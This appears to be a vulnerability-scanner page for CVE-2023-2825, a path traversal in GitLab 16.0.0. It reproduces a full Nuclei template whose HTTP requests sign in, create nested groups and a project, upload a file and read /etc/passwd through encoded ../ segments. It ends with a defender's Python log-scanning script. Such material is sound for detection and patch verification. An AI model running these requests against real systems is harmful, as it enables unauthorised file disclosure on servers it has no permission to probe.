GitLab 16.0.0 - Path Traversal
ID: CVE-2023-2825
Severity: high
Author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
Tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
Description
An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.
YAML Source
id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.12203
    epss-percentile: 0.95384
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive

variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}

      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}

      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--

      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a00473045022100d301575dd91b47ae9535768b29bfe6385091c14a89943e2ed6122ca7daea1a2002200929739b5580d077129b959071fdaf24c9ef7cbee8030e95abe23868328db52d:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This Nuclei template checks a GitLab instance for CVE-2023-2825. It is tagged authenticated and intrusive for a reason: it signs in with the {{username}} and {{password}} variables (supplied on the command line with -var), creates eleven nested public groups and a public project named CVE-2023-2825, uploads a file to that project, and then requests the upload path with encoded ../ segments. The match requires the hex word 726f6f743a78 (root:x) in the body together with an application/octet-stream Content-Type and the etc%2Fpasswd string in the response headers. The template performs no cleanup, so the groups and project it creates remain on the instance after the scan and can be found in the GitLab audit log.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2825.yaml"
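The final request of the template above is the signature a defender can look for in GitLab's front-end web server logs: a GET under `/uploads/<secret>/` whose remainder, once percent-decoded, climbs out of the upload directory with `..` segments. The following is an added example, not code from the template or from the Nuclei or GitLab projects; it scans constructed nginx-style access-log lines for that pattern, decodes repeatedly so single and double percent-encoding are both caught, and records the group nesting depth of the request path, since the advisory says the issue needs a project nested at least five groups deep. The log format, the sample lines and the `[0-9a-z]+` upload-secret pattern (borrowed from the template's extractor) are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in nginx "combined" format; these are
# illustrative only and not taken from any real GitLab deployment.
SAMPLE_LOG = """\
203.0.113.5 - - [24/May/2023:10:01:02 +0000] "GET /g1/g2/g3/g4/g5/g6/proj/uploads/0123456789abcdef0123456789abcdef/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432 "-" "curl/8.0"
203.0.113.5 - - [24/May/2023:10:01:03 +0000] "GET /g1/g2/proj/uploads/0123456789abcdef0123456789abcdef/image.png HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
198.51.100.7 - - [24/May/2023:10:02:11 +0000] "POST /groups HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [24/May/2023:10:02:12 +0000] "GET /a/b/c/d/e/f/g/h/p/uploads/ffffffffffffffffffffffffffffffff/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 404 0 "-" "python-requests/2.31"
"""

# Fields of an nginx combined log line that we need: client IP, timestamp,
# request method and path, and the HTTP status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Project upload URL: /<group>/.../<project>/uploads/<secret>/<rest>.
# The secret character class mirrors the template's upload-hash extractor (assumption).
UPLOAD_RE = re.compile(r'^(?P<prefix>(?:/[^/]+)+)/uploads/(?P<secret>[0-9a-z]+)/(?P<rest>.*)$')


def decode_fully(value, rounds=3):
    """Percent-decode until stable (bounded) so %2e%2e and %252e%252e both become '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(path):
    """Return a finding dict if the path is an upload fetch that traverses upward, else None."""
    m = UPLOAD_RE.match(path)
    if not m:
        return None
    rest = decode_fully(m.group('rest'))
    segments = [seg for seg in rest.split('/') if seg]
    dotdot = sum(1 for seg in segments if seg == '..')
    if dotdot == 0:
        return None
    # prefix is /group1/.../groupN/project, so the group depth is N.
    group_depth = len([s for s in m.group('prefix').split('/') if s]) - 1
    return {
        'upload_secret': m.group('secret'),
        'traversal_segments': dotdot,
        'group_depth': group_depth,
        'decoded_target': rest,
    }


def scan_log(text):
    """Parse each log line and collect traversal findings with request metadata attached."""
    findings = []
    for line in text.splitlines():
        lm = LOG_RE.match(line)
        if not lm:
            continue
        finding = analyse_request(lm.group('path'))
        if finding:
            finding.update(ip=lm.group('ip'), status=int(lm.group('status')), timestamp=lm.group('ts'))
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} status={f['status']} depth={f['group_depth']} "
              f"dotdot={f['traversal_segments']} -> {f['decoded_target']}")
```

A status of 200 on such a request is the strongest signal (the template's own matcher also requires a body), while 404s still show that someone is probing upload paths. Pair the path check with the audit log entries for group and project creation noted in the guide above, since the template creates those right before the traversal request.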